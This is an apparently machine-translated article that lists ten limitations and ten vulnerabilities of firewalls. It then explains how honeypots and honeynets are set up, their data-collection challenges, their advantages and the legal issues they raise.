Honeypot Technology: The research of eliminating firewall limitation and vulnerability _ Vulnerability

Firewall is the most used security device on network, and it is an important cornerstone of network security. Firewall manufacturers in order to occupy the market, the firewall propaganda more and more, the market appeared a lot of wrong things. One of the typical mistakes is to make the firewall universal. But in the August 2002 computer security, the firewall has breached the rate of more than 47%. It is necessary to study the limitations and vulnerabilities of firewalls to ensure the safe use of the network.
Firewall Ten Limitations
First, the firewall can not prevent the attack without the firewall. The firewall cannot be checked without data from the firewall.

Second, the firewall can not resolve attacks and security problems from the internal network. Firewalls can be designed to both prevent and defend inside, who are not trustworthy, but the vast majority of units because of inconvenient, do not require a firewall to prevent inside.

Third, firewalls do not prevent the policy from being improperly configured or the security threats caused by misconfigured. A firewall is a passive security policy enforcement device, like a doorman, that enforces security in accordance with policy rules and does not take the liberty of doing so.

The firewall cannot prevent the man-made or natural damage that can be contacted. A firewall is a security device, but the firewall itself must exist in a secure place.

Firewall can not prevent the use of the standard network protocol defects in the attack. Once a firewall permits certain standard network protocols, firewalls cannot prevent attacks that exploit the flaws in the protocol.

Vi. firewalls do not prevent attacks that exploit server system vulnerabilities. The hacker attacks the vulnerability of the server through the access port allowed by the firewall, which cannot be prevented by the firewall.

The firewall cannot prevent the transmission of infected files. The firewall itself does not have the ability to kill the virus, even if the integrated third-party anti-virus software, there is no software can kill all the virus.

The firewall cannot prevent data-driven attacks. Data-driven attacks can occur when some seemingly harmless data is mailed or copied to the intranet host and executed.

Nine, the firewall can not prevent internal leakage behavior. A legitimate user inside the firewall is actively leaking, the firewall is powerless.

X. Firewalls cannot prevent the threat of their own security vulnerabilities. Firewalls protect others sometimes but can't protect themselves, there is no guarantee that the firewall will not have security vulnerabilities. Therefore, a firewall must also provide some kind of security.

Top Ten vulnerabilities of firewalls

One, the operating system of the firewall can not guarantee no loopholes. No firewall manufacturer has yet said that its firewall does not have an operating system. There is no absolute guarantee that there is no security breach with the operating system.

Second, the firewall hardware can not guarantee the failure. All hardware has a life cycle, will be aging, there is always a failure of the day.

Third, firewall software can not guarantee no loopholes. Firewall software is also software, is the software will have loopholes.

Four, the firewall cannot solve the TCP/IP and other protocols vulnerabilities. The firewall itself is based on TCP/IP and other protocols to implement, you will not be able to resolve the TCP/IP operation vulnerabilities.

The firewall cannot distinguish between malicious commands or well-intentioned commands. There are many commands that are a legitimate command for an administrator, and can be a dangerous command in the hands of a hacker.

Six, the firewall can not distinguish between malicious traffic and goodwill traffic. A user uses the ping command as a network diagnostics and network attack, with no difference in traffic.

Seven, the security of the firewall and multi-function in inverse proportion. The multifunction is contrary to the security principle of the firewall. Therefore, you should minimize functionality unless you are certain that you need some functionality.

Eight, the security and speed of the firewall is inversely proportional. The security of the firewall is based on the inspection of the data, the finer the inspection the safer, but the finer the check the slower the speed.

The multi-function of the firewall is inversely proportional to the speed. The more features the firewall has, the greater the CPU and memory consumption, the more functions, the more checks, the slower the speed.

X. Firewall can not guarantee the security of the permitted services. A firewall allows a service, but it does not guarantee the security of the service. Security issues with the permitted services must be resolved by application security.

The market needs a new generation of firewalls

In the increasingly popular computer network today, the market needs a new generation of firewalls to change the current unsafe situation.

A new generation of firewalls is positioned to address the following issues: 1. Security issues of the Protocol; 2. Problems of virus-generated attacks; 3. Issues of credibility and credibility; 4. Firewall itself security issues.

With the development of network security technology, such as physical isolation network brake (GAP), leak-proof system (anti-disclosure), antivirus Gateway (anti-virus gateway), anti-attack gateway (Anti-ddos gateways), Intrusion Detection Defense (IDP) and other technologies, greatly compensate for the lack of firewall technology, thus constituting a more secure network defense system.

Are you tired of keeping a hacker away? Now you should take the offensive. At least this is the idea that the so-called honeypot (honeypot) contains. A honeypot is a computer system that aims to attract attackers and then record every move.


The realization of honeypot technology

A honeypot is like an intelligence-gathering system. Honeypot seems to be deliberately targeted to attack, luring hackers to come to attack. So when an attacker invades, you can see how he succeeds and keep abreast of the latest attacks and vulnerabilities against your server. You can also tap into the links between hackers, collect the tools used by hackers, and master their social networks.

Setting up a honeypot is not difficult, as long as there is a computer running on the external Internet that does not have a patch on Microsoft Windows or Red Hat Linux. Because hackers may set traps to get a computer's log and censorship capabilities, you need to place a network monitoring system between the computer and the Internet to silently record all traffic to and from the computer. And then just sit down and wait for the attackers to get into their trap.

However, setting up a honeypot does not mean that there is no risk. This is because most security-compromised systems are used by hackers to attack other systems. This is the downstream responsibility (downstream liability), which leads to the topic of the Honey Net (honeynet).

Honey net refers to the use of a technology of the honeypot, so that a reasonable way to record the action of hackers, while minimizing or excluding the Internet on other systems caused by the risks. The honeypot built behind the reverse firewall is an example. The purpose of the firewall is not to prevent inbound connections, but to prevent the honeypot from establishing outbound connections. However, while this approach makes the honeypot less disruptive to other systems, it can be easily discovered by hackers.

Data collection is another technical challenge for setting up a honeypot. As long as the honeypot monitors record every packet in and out of the system, they can be clear about what the hacker is doing. The honeypot itself log file is also a good source of data. But the log file is easily removed by an attacker, so the usual approach is to have the honeypot send a log backup to a remote system log server on the same network but with a better defense mechanism. (Be sure to monitor the log server at the same time.) If attackers break into the server with new tricks, the honeypot will surely prove its worth. ）

In recent years, with the increasing use of encryption technology in black Hat groups, data collection tasks have become more difficult. Today, they have accepted the advice of many computer security professionals to switch to SSH and other cryptographic protocols to make sure that network monitoring does nothing for its own communications. Honey net to deal with the calculation of the password is to modify the target computer operating system so that all typed characters, transmitted files and other information are recorded in another monitoring system log inside. Because an attacker might find such a log, the Honey Net plan uses a covert technique. For example, to hide typed characters into a NetBIOS broadcast packet.


The advantages of Honeypot technology

One of the advantages of honeypot systems is that they greatly reduce the data to be analyzed. For a typical web site or mail server, attack traffic is often overwhelmed by legitimate traffic. And the honeypot access data is mostly attack traffic. Thus, it is much easier to browse the data and identify the actual behavior of the attacker.

Since the start of 1999, the Honey Net program has collected a lot of information, you can find on the www.honeynet.org. Some of the findings include: attack rates have increased by one-fold over the past year; attackers are increasingly using automatic-click tools that plug vulnerabilities (tools are easy to update if new vulnerabilities are found); But few hackers use new methods of attack, despite bravado.

Honeypot is mainly a research tool, but it also has a real commercial application. Set the honeypot on an IP address that is adjacent to your company's Web or mail server, and you can understand the attacks it has suffered.

Of course, the honeypot and the honey net are not "after the shooting" (Fire and forget) security equipment. According to the Honey net plan, to really understand the damage caused by an attacker in just 30 minutes, it usually takes more than 30-40 hours to analyze. The system also needs to be carefully maintained and tested. With the honeypot, you have to constantly and hackers wits. You can say this: you choose the battlefield, and the opponents choose the time to contest. Therefore, you must always remain vigilant.

One of the most exciting development achievements in the Honeypot field is the virtual honey net. Virtual computer networks run on a single machine that uses virtual computer systems such as VMware or User-mode Linux. Virtual systems allow you to run several virtual computers (usually 4 to 10) on a single host system. The virtual honey net greatly reduces the cost, the machine occupies the space and manages the honeypot the difficulty. In addition, virtual systems typically support "hang" and "restore" functions, so you can freeze compromised computers, analyze attack methods, and then open TCP/IP connections and other services on the system.

For the Chief Security Officer (CSO) of big organizations, one of the best reasons to run a honey net is to find people who are hostile inside.
The legal problems of honeypot technology
Unexpectedly, the monitoring of the honeypot also bear the corresponding legal consequences, such as the possibility of violating the "anti-eavesdropping law." Although there is no case law at the moment, most people familiar with the law believe that the two sides ' agreed slogans are the way out. In other words, give each honeypot the slogan: "Anyone using the system agrees that their actions are monitored and disclosed to others, including law enforcement officers." ”